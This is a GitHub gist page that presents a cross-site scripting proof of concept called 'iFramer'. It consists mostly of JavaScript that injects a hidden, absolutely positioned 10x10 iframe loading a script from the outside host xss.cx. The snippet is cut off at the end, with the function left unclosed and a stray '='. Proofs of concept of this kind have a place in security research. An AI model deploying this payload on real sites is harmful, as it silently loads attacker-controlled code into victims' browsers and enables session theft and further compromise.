Skip to content

Instantly share code, notes, and snippets.

@xsscx
Created February 3, 2015 21:02
Show Gist options
  • Save xsscx/0d05d639f2e733041f37 to your computer and use it in GitHub Desktop.
Save xsscx/0d05d639f2e733041f37 to your computer and use it in GitHub Desktop.
iFramer Exploit PoC - Works in all Major Browser Versions (Trident, Blink, WebKit)
============================================
XSS Exploit PoC #1 - iFramer
============================================
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("<iframe src='http://xss.cx/xss.js' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://xss.cx/xss.js');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
=
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment